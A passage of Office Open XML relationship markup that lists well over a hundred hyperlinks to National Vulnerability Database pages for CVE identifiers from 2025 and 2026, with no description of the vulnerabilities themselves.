TargetMode="External" Id="rId1289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71341" TargetMode="External" Id="rId1290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72937" TargetMode="External" Id="rId1291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72945" TargetMode="External" Id="rId1292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72964" TargetMode="External" Id="rId1293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72966" TargetMode="External" Id="rId1294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72980" TargetMode="External" Id="rId1295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73004" TargetMode="External" Id="rId1296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73008" TargetMode="External" Id="rId1297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77488" TargetMode="External" Id="rId1298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77491" TargetMode="External" Id="rId1299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77492" TargetMode="External" Id="rId1300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78454" TargetMode="External" Id="rId1301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78506" TargetMode="External" Id="rId1302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78513" TargetMode="External" Id="rId1303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79910" TargetMode="External" Id="rId1304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80160" TargetMode="External" Id="rId1305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80162" TargetMode="External" Id="rId1306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81387" TargetMode="External" Id="rId1307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81390" TargetMode="External" Id="rId1308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81391" TargetMode="External" Id="rId1309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81392" TargetMode="External" Id="rId1310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81393" TargetMode="External" Id="rId1311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81394" TargetMode="External" Id="rId1312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81395" TargetMode="External" Id="rId1313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81399" TargetMode="External" Id="rId1314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81400" TargetMode="External" Id="rId1315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81401" TargetMode="External" Id="rId1316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81958" TargetMode="External" Id="rId1317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81977" TargetMode="External" Id="rId1318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81978" TargetMode="External" Id="rId1319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81982" TargetMode="External" Id="rId1320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81984" TargetMode="External" Id="rId1321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81991" TargetMode="External" Id="rId1322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81993" TargetMode="External" Id="rId1323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82001" TargetMode="External" Id="rId1324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83501" TargetMode="External" Id="rId1325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83949" TargetMode="External" Id="rId1326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83951" TargetMode="External" Id="rId1327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83991" TargetMode="External" Id="rId1328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85875" TargetMode="External" Id="rId1329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86084" TargetMode="External" Id="rId1330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86511" TargetMode="External" Id="rId1331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86513" TargetMode="External" Id="rId1332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86519" TargetMode="External" Id="rId1333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86665" TargetMode="External" Id="rId1334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86666" TargetMode="External" Id="rId1335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86669" TargetMode="External" Id="rId1336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86672" TargetMode="External" Id="rId1337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86673" TargetMode="External" Id="rId1338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86716" TargetMode="External" Id="rId1339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86808" TargetMode="External" Id="rId1340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64542" TargetMode="External" Id="rId1341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64584" TargetMode="External" Id="rId1342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64588" TargetMode="External" Id="rId1343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64589" TargetMode="External" Id="rId1344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64610" TargetMode="External" Id="rId1345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64618" TargetMode="External" Id="rId1346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64830" TargetMode="External" Id="rId1347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64838" TargetMode="External" Id="rId1348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64854" TargetMode="External" Id="rId1349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64866" TargetMode="External" Id="rId1350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64868" TargetMode="External" Id="rId1351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19479" TargetMode="External" Id="rId1352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19612" TargetMode="External" Id="rId1353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19644" TargetMode="External" Id="rId1354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19713" TargetMode="External" Id="rId1355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-2520" TargetMode="External" Id="rId1356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27227" TargetMode="External" Id="rId1357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52307" TargetMode="External" Id="rId1358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69402" TargetMode="External" Id="rId1359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69417" TargetMode="External" Id="rId1360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69690" TargetMode="External" Id="rId1361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71356" TargetMode="External" Id="rId1362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71357" TargetMode="External" Id="rId1363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71388" TargetMode="External" Id="rId1364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71440" TargetMode="External" Id="rId1365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71565" TargetMode="External" Id="rId1366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72626" TargetMode="External" Id="rId1367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72627" TargetMode="External" Id="rId1368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75629" TargetMode="External" Id="rId1369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75635" TargetMode="External" Id="rId1370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75636" TargetMode="External" Id="rId1371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75637" TargetMode="External" Id="rId1372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75639" TargetMode="External" Id="rId1373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75640" TargetMode="External" Id="rId1374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75642" TargetMode="External" Id="rId1375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75643" TargetMode="External" Id="rId1376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75644" TargetMode="External" Id="rId1377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75646" TargetMode="External" Id="rId1378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75647" TargetMode="External" Id="rId1379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75651" TargetMode="External" Id="rId1380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75652" TargetMode="External" Id="rId1381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75657" TargetMode="External" Id="rId1382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75659" TargetMode="External" Id="rId1383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75660" TargetMode="External" Id="rId1384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75661" TargetMode="External" Id="rId1385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75666" TargetMode="External" Id="rId1386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75667" TargetMode="External" Id="rId1387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75668" TargetMode="External" Id="rId1388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75669" TargetMode="External" Id="rId1389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75670" TargetMode="External" Id="rId1390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75671" TargetMode="External" Id="rId1391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75672" TargetMode="External" Id="rId1392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75674" TargetMode="External" Id="rId1393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75675" TargetMode="External" Id="rId1394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75677" TargetMode="External" Id="rId1395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75678" TargetMode="External" Id="rId1396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75679" TargetMode="External" Id="rId1397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75680" TargetMode="External" Id="rId1398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75681" TargetMode="External" Id="rId1399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75683" TargetMode="External" Id="rId1400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75685" TargetMode="External" Id="rId1401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75687" TargetMode="External" Id="rId1402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75690" TargetMode="External" Id="rId1403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75691" TargetMode="External" Id="rId1404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75692" TargetMode="External" Id="rId1405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75693" TargetMode="External" Id="rId1406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75694" TargetMode="External" Id="rId1407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75695" TargetMode="External" Id="rId1408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75696" TargetMode="External" Id="rId1409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75700" TargetMode="External" Id="rId1410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75701" TargetMode="External" Id="rId1411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75702" TargetMode="External" Id="rId1412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75704" TargetMode="External" Id="rId1413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75705" TargetMode="External" Id="rId1414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75706" TargetMode="External" Id="rId1415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75707" TargetMode="External" Id="rId1416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75708" TargetMode="External" Id="rId1417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75709" TargetMode="External" Id="rId1418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75710" TargetMode="External" Id="rId1419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75711" TargetMode="External" Id="rId1420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75712" TargetMode="External" Id="rId1421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75713" TargetMode="External" Id="rId1422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75714" TargetMode="External" Id="rId1423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75715" TargetMode="External" Id="rId1424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75716" TargetMode="External" Id="rId1425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75717" TargetMode="External" Id="rId1426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75718" TargetMode="External" Id="rId1427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75719" TargetMode="External" Id="rId1428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75720" TargetMode="External" Id="rId1429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75722" TargetMode="External" Id="rId1430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75724" TargetMode="External" Id="rId1431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75725" TargetMode="External" Id="rId1432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75727" TargetMode="External" Id="rId1433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75729" TargetMode="External" Id="rId1434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75730" TargetMode="External" Id="rId1435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75731" TargetMode="External" Id="rId1436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75733" TargetMode="External" Id="rId1437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75734" TargetMode="External" Id="rId1438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75735" TargetMode="External" Id="rId1439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75736" TargetMode="External" Id="rId1440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75737" TargetMode="External" Id="rId1441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75738" TargetMode="External" Id="rId1442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75739" TargetMode="External" Id="rId1443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75740" TargetMode="External" Id="rId1444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75741" TargetMode="External" Id="rId1445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75742" TargetMode="External" Id="rId1446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79905" TargetMode="External" Id="rId1447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84385" TargetMode="External" Id="rId1448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86996" TargetMode="External" Id="rId1449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12962" TargetMode="External" Id="rId1450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19614" TargetMode="External" Id="rId1451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19625" TargetMode="External" Id="rId1452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33389" TargetMode="External" Id="rId1453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 